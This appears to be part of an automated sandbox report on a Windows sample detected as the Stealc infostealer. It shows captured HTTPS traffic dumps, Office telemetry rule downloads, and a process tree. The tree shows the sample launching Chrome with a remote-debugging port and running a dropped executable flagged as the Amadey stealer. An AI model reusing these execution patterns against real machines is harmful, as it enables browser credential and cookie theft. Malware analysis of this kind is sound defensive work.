28e73L2oyLPMDd2+Byw2UwDJfk/rNkmBeunoaVq0LFX38BINt2jPdQzNXWwJb3FTw42tyznz2YD5unz7iGY/VzHhgJ4/bwn1D0wYP4et8ZODDLzM7vXIwPkpLmratCxV9/ASDbImirWKDkmxxOwxUYfYOh9sJYhCKrx660mk/hVyJIaevO8Ks8wNGX8H7XHRBsr+Dum1ysJ4a2r7mTe9kiH2FBX/6E/xSh8UfEesMxXST+5KunRKkSy6aqiJp
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: 69 78 64 39 2b 61 6f 70 78 6a 51 31 61 76 77 5a 73 73 4e 4e 44 6a 4c 36 4e 71 48 63 4c 77 48 6d 70 4b 69 38 4b 5a 2b 78 48 6f 65 48 43 44 61 71 37 67 72 31 44 68 30 6b 37 56 36 6e 69 30 59 46 59 4b 39 7a 71 4e 34 68 43 75 36 37 70 62 77 6b 6d 66 46 57 7a 34 67 58 65 76 79 67 50 38 34 34 50 6d 72 39 47 4c 66 50 51 41 30 6b 2b 7a 54 70 6d 47 59 44 38 75 6e 7a 37 67 4b 64 36 30 71 46 72 68 74 32 39 62 34 37 33 58 6b 68 4b 75 74 51 75 63 63 42 55 57 44 7a 4f 4b 50 66 4a 51 33 75 70 4b 75 6e 4a 5a 66 35 58 63 2b 53 45 58 7a 67 71 69 6a 48 4e 6a 52 67 2b 68 79 78 78 30 55 62 4b 37 64 39 36 64 45 2b 52 4c 4c 70 69 36 55 38 76 65 4e 43 68 35 39 65 62 37 4b 70 49 59 5a 68 66 6d 33 2b 45 62 2f 42 52 77 49 6c 2b 6a 4f 73 33 43 45 49 36 71 6d 6f 71 43 79 54 2b 56 6a Data Ascii: ixd9+aopxjQ1avwZssNNDjL6NqHcLwHmpKi8KZ+xHoeHCDaq7gr1Dh0k7V6ni0YFYK9zqN4hCu67pbwkmfFWz4gXevygP844Pmr9GLfPQA0k+zTpmGYD8unz7gKd60qFrht29b473XkhKutQuccBUWDzOKPfJQ3upKunJZf5Xc+SEXzgqijHNjRg+hyxx0UbK7d96dE+RLLpi6U8veNCh59eb7KpIYZhfm3+Eb/BRwIl+jOs3CEI6qmoqCyT+Vj
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: 76 32 72 4a 63 30 2f 4d 47 58 30 48 4c 4f 4c 44 30 6b 6e 37 33 50 78 6c 67 45 65 35 36 2b 38 76 78 2b 5a 38 51 47 48 6e 31 35 76 73 71 6b 68 68 6d 46 2b 61 66 34 61 73 38 35 46 41 53 66 30 4d 71 58 53 4b 77 6e 75 6f 4b 2b 72 4f 49 7a 33 58 73 65 50 48 6e 6e 2b 76 43 50 44 4f 54 49 6b 76 46 43 35 30 77 46 52 59 4d 59 6b 71 5a 59 35 53 76 50 70 72 4b 4a 71 78 72 46 66 79 70 49 63 65 66 4b 76 4c 73 49 79 4f 57 4c 30 45 62 33 4f 51 67 77 6d 39 6a 4f 6c 33 43 45 4d 34 4b 65 6d 71 43 36 59 39 78 43 4a 77 42 64 75 73 76 5a 74 39 44 51 77 62 66 45 57 73 39 31 70 4f 47 44 6f 66 62 43 57 49 51 69 71 38 65 75 71 49 5a 62 39 56 63 2b 46 45 58 37 34 70 69 4c 4a 4b 7a 39 72 2b 78 65 31 78 6b 34 48 4a 66 6b 68 72 74 30 74 44 4f 4f 6e 72 65 35 6b 33 76 5a 49 68 39 68 51 Data Ascii: v2rJc0/MGX0HLOLD0kn73PxlgEe56+8vx+Z8QGHn15vsqkhhmF+af4as85FASf0MqXSKwnuoK+rOIz3XsePHnn+vCPDOTIkvFC50wFRYMYkqZY5SvPprKJqxrFfypIcefKvLsIyOWL0Eb3OQgwm9jOl3CEM4KemqC6Y9xCJwBdusvZt9DQwbfEWs91pOGDofbCWIQiq8euqIZb9Vc+FEX74piLJKz9r+xe1xk4HJfkhrt0tDOOnre5k3vZIh9hQ
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: 58 42 4d 54 70 71 34 42 47 78 69 77 39 4a 4a 2b 39 7a 38 5a 59 58 45 75 32 75 70 4f 77 44 6d 65 70 52 7a 59 4d 62 65 72 4b 78 59 39 39 35 4f 57 69 79 53 50 37 47 54 51 51 6b 35 54 2b 70 31 69 38 44 34 4c 75 6b 6f 53 65 64 38 56 58 56 67 51 4a 35 2b 61 73 75 77 6a 59 78 61 50 6f 61 2f 6f 55 42 44 6a 69 33 61 2b 6e 36 4a 52 58 67 36 34 79 30 50 4a 6e 39 51 63 79 4e 48 44 62 74 34 44 53 47 50 6a 49 6b 71 6c 43 2b 79 6b 77 62 4a 66 59 35 6f 39 73 75 43 2b 2b 73 70 4b 6f 75 6c 66 39 43 79 59 38 51 63 50 6d 76 4b 4d 55 79 4e 47 72 37 41 76 36 46 41 51 34 34 74 32 76 70 2f 44 30 46 35 36 58 70 67 43 47 49 39 68 4c 6d 6a 68 74 78 2f 72 68 74 32 58 63 6e 4a 50 55 63 2f 70 4d 42 41 43 37 37 4d 4b 37 65 4c 67 48 71 6f 71 75 68 49 4a 44 32 51 73 32 4d 47 6d 54 39 72 Data Ascii: XBMTpq4BGxiw9JJ+9z8ZYXEu2upOwDmepRzYMberKxY995OWiySP7GTQQk5T+p1i8D4LukoSed8VXVgQJ5+asuwjYxaPoa/oUBDji3a+n6JRXg64y0PJn9QcyNHDbt4DSGPjIkqlC+ykwbJfY5o9suC++spKoulf9CyY8QcPmvKMUyNGr7Av6FAQ44t2vp/D0F56XpgCGI9hLmjhtx/rht2XcnJPUc/pMBAC77MK7eLgHqoquhIJD2Qs2MGmT9r
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: 68 4b 75 74 51 75 63 63 42 55 57 44 33 4e 36 58 56 49 51 72 6c 70 4b 53 70 49 5a 48 37 58 74 57 50 46 58 37 2b 70 69 44 55 4d 7a 52 32 2b 78 6d 7a 78 55 6b 62 49 37 64 39 36 64 45 2b 52 4c 4c 70 6d 61 51 70 6b 75 64 64 79 4d 41 50 4f 4f 76 75 4b 73 70 35 5a 69 54 67 41 72 37 41 51 51 34 75 35 54 4b 68 32 53 77 45 37 4b 4b 68 72 53 4f 61 2f 31 6e 42 67 52 31 33 38 36 34 6f 78 6a 41 73 61 62 4a 65 2f 73 78 5a 53 58 69 33 42 4b 58 64 46 77 66 38 36 62 54 67 4d 39 37 32 58 49 66 59 55 48 66 67 6f 79 58 43 4f 54 4e 69 2b 52 47 2f 79 45 45 4a 49 2f 63 32 6f 74 6b 67 41 2b 65 6a 6f 71 63 34 6c 76 56 43 78 34 77 55 4e 72 7a 75 4b 74 35 35 5a 69 54 43 45 37 58 48 51 51 51 31 74 79 7a 6e 7a 32 59 44 35 75 6e 7a 37 69 4b 56 2b 6c 62 4d 67 78 4e 34 2b 61 51 69 79 54 Data Ascii: hKutQuccBUWD3N6XVIQrlpKSpIZH7XtWPFX7+piDUMzR2+xmzxUkbI7d96dE+RLLpmaQpkuddyMAPOOvuKsp5ZiTgAr7AQQ4u5TKh2SwE7KKhrSOa/1nBgR13864oxjAsabJe/sxZSXi3BKXdFwf86bTgM972XIfYUHfgoyXCOTNi+RG/yEEJI/c2otkgA+ejoqc4lvVCx4wUNrzuKt55ZiTCE7XHQQQ1tyznz2YD5unz7iKV+lbMgxN4+aQiyT
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: 42 72 2f 47 53 67 56 69 39 6a 36 35 30 57 5a 4b 71 71 2f 72 39 6e 72 51 73 56 54 57 77 45 67 6d 6f 50 56 34 6c 57 35 75 4e 75 31 65 70 34 74 58 53 58 69 6c 66 65 6e 45 5a 6c 79 71 37 71 69 38 4f 4a 6a 79 52 73 54 48 4c 6b 6a 53 70 53 48 46 4e 54 39 6a 73 6c 37 2b 78 41 46 52 47 62 63 77 75 38 52 70 46 66 79 6b 75 36 6c 6d 6c 75 42 64 79 38 42 65 4e 72 36 71 4a 73 6f 38 4f 58 53 39 41 71 37 41 54 52 39 73 38 79 48 70 6d 47 59 56 34 61 61 35 6f 43 33 52 34 45 62 4b 6b 42 4e 7a 39 65 49 6c 31 7a 51 79 4a 4c 78 51 71 38 42 4e 44 79 33 69 66 4c 6a 41 4a 52 4c 74 35 61 4f 2f 4a 35 4b 78 62 34 6e 41 43 44 61 71 37 68 6a 46 4e 7a 42 6a 35 41 48 7a 36 30 6f 46 49 2f 73 79 72 70 5a 6f 52 4f 7a 70 38 2f 31 6b 33 76 56 42 68 39 68 41 4a 4b 6e 37 66 70 46 70 62 48 75 Data Ascii: Br/GSgVi9j650WZKqq/r9nrQsVTWwEgmoPV4lW5uNu1ep4tXSXilfenEZlyq7qi8OJjyRsTHLkjSpSHFNT9jsl7+xAFRGbcwu8RpFfyku6lmluBdy8BeNr6qJso8OXS9Aq7ATR9s8yHpmGYV4aa5oC3R4EbKkBNz9eIl1zQyJLxQq8BNDy3ifLjAJRLt5aO/J5Kxb4nACDaq7hjFNzBj5AHz60oFI/syrpZoROzp8/1k3vVBh9hAJKn7fpFpbHu
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: 31 64 4a 65 4b 52 39 36 63 52 6d 58 4b 72 75 70 61 4d 72 6e 66 39 54 31 5a 49 57 64 65 53 74 61 76 67 48 47 32 6e 2f 46 62 44 4d 66 7a 63 42 2f 53 4f 6b 32 53 45 36 31 4a 36 36 71 54 72 63 31 31 50 52 67 31 41 34 73 72 5a 74 6e 6e 6b 66 62 75 49 64 73 63 77 42 52 32 44 7a 63 2f 47 57 41 77 6e 6e 72 4b 57 70 61 4c 2f 37 51 4d 71 50 46 7a 61 38 37 69 47 47 59 58 35 6c 2b 41 43 7a 78 45 5a 46 4a 2b 30 30 36 5a 68 6d 43 71 72 78 36 36 38 67 6a 76 78 66 77 4d 77 57 65 50 7a 75 4d 6f 67 67 66 6e 4b 79 53 4f 32 46 41 52 74 67 72 33 50 75 32 43 73 46 36 61 65 6f 76 44 69 59 38 6b 62 45 78 79 35 49 31 36 4d 67 77 7a 63 35 57 73 77 78 74 4e 74 4d 42 69 65 31 45 36 37 41 4a 54 72 55 6e 72 71 70 4f 74 7a 58 55 39 47 44 55 44 69 79 74 6d 32 65 65 52 39 75 34 68 32 78 Data Ascii: 1dJeKR96cRmXKrupaMrnf9T1ZIWdeStavgHG2n/FbDMfzcB/SOk2SE61J66qTrc11PRg1A4srZtnnkfbuIdscwBR2Dzc/GWAwnnrKWpaL/7QMqPFza87iGGYX5l+ACzxEZFJ+006ZhmCqrx668gjvxfwMwWePzuMoggfnKySO2FARtgr3Pu2CsF6aeovDiY8kbExy5I16Mgwzc5WswxtNtMBie1E67AJTrUnrqpOtzXU9GDUDiytm2eeR9u4h2x

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	49914	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:24 UTC	192	OUT	GET /rules/rule703000v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:25 GMT Content-Type: text/xml Content-Length: 1369 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE32FE1A2" x-ms-request-id: d5cdc394-301e-0051-3837-2f38bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031325Z-15869dbbcc6x4rp4hC1DFW3t7w00000008h0000000007edu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49915	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:25 UTC	192	OUT	GET /rules/rule700751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:25 GMT Content-Type: text/xml Content-Length: 1414 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE03B051D" x-ms-request-id: 55d4e3a1-401e-00a3-7d5f-2e8b09000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031325Z-17df447cdb5km9skhC1DFWy2rc00000003w000000000fqt7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:25 UTC	1414	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49913	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:25 UTC	192	OUT	GET /rules/rule703001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:25 GMT Content-Type: text/xml Content-Length: 1406 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB16F27E" x-ms-request-id: 877b8ed5-701e-003e-2522-3079b3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031325Z-15869dbbcc6gt87nhC1DFWh9un00000007x000000000kdm0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:25 UTC	1406	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49917	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:25 UTC	192	OUT	GET /rules/rule700750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:25 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:25 GMT Content-Type: text/xml Content-Length: 1377 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAFF0125" x-ms-request-id: 4b8e26e4-601e-00ab-715f-2e66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031325Z-15869dbbcc68l9dbhC1DFWr9fg0000000150000000005x3m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:25 UTC	1377	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49918	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:25 UTC	192	OUT	GET /rules/rule700151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:25 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0A2434F" x-ms-request-id: 118143e1-001e-0066-4b5f-2e561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031325Z-15869dbbcc6vr5dxhC1DFWqn64000000026g00000000fpq3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:25 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49922	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:25 UTC	192	OUT	GET /rules/rule703450v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:25 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:25 GMT Content-Type: text/xml Content-Length: 1372 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6669CA7" x-ms-request-id: 65bcf2bc-601e-003e-18da-2f3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031325Z-15869dbbcc65c582hC1DFWgpv40000000180000000004wa8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:25 UTC	1372	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <

Target ID:	0
Start time:	22:11:55
Start date:	06/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x770000
File size:	2'163'712 bytes
MD5 hash:	D21A2EB1558C04AF68AA39932C381A77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1988015001.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1669066105.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1989629326.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:12:04
Start date:	06/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:12:04
Start date:	06/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2156,i,3658342765424133982,5433564740709363588,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:12:28
Start date:	06/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsFHIEBKKFHI.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:12:28
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:12:28
Start date:	06/11/2024
Path:	C:\Users\user\DocumentsFHIEBKKFHI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsFHIEBKKFHI.exe"
Imagebase:	0x8b0000
File size:	3'228'160 bytes
MD5 hash:	D1C392CD0570CDFD8CC42A3D5DFCB0FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2046814392.00000000008B1000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
